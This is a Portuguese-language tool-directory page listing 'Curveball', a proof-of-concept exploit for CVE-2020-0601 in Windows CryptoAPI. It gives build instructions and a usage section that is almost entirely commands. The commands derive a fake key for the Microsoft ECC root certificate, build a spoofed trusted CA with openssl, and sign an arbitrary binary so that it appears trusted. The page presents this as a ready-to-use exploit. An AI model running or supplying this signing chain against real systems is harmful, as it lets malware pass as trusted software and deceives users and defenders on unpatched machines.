Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Curveball — PoC para CVE-2020-0601 - exploit CryptoAPI | Kitploit
Ferramentas/GitHubGitHub/ioncodes/curveball
Análise de VulnerabilidadesAnálise de CódigoExploraçãoCriptografiaTestes de PenetraçãoExploração de Binários
GitHubioncodes/curveball

Curveball

PoC para CVE-2020-0601 - exploit CryptoAPI

Ver Repositório
20414há 4 anosRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Curveball

Um PoC para CVE-2020-0601. Um post de blog detalhado pode ser encontrado aqui. Este exploit permite criar um certificado confiável falso abusando de como a CryptoAPI lida com certos parâmetros em certificados baseados em ECC.

Configuração

Clone o repositório e abra-o no Visual Studio 2019. Mude para Release e compile-o. Você pode encontrar binários pré-compilados aqui.

Uso

root@kitploit:~
.\Curveball.exe MicrosoftECCProductRootCertificateAuthority.cer MicrosoftECCProductRootCertificateAuthority_fake.key
# in linux bash (you can also use Windows but you'd have to get an alternative for osslsigncode). WSL on Windows works fine.
openssl req -new -x509 -key MicrosoftECCProductRootCertificateAuthority_fake.key -out trusted_ca.crt
openssl ecparam -name secp384r1 -genkey -noout -out cert.key
openssl req -new -key cert.key -out cert.csr -config openssl.conf -reqexts v3_cs
openssl x509 -req -in cert.csr -CA trusted_ca.crt -CAkey MicrosoftECCProductRootCertificateAuthority_fake.key -CAcreateserial -out cert.crt -days 10000 -extfile openssl.conf -extensions v3_cs
openssl pkcs12 -export -in cert.crt -inkey cert.key -certfile trusted_ca.crt -name "Code Signing" -out cert.p12
./osslsigncode sign -pkcs12 cert.p12 -n "Signed by Layle" -in <BINARY_TO_SIGN> -out <SIGNED_BINARY>
Baixar ferramenta

Resultado

Note que o instalador do 7zip normalmente não é assinado!

confiável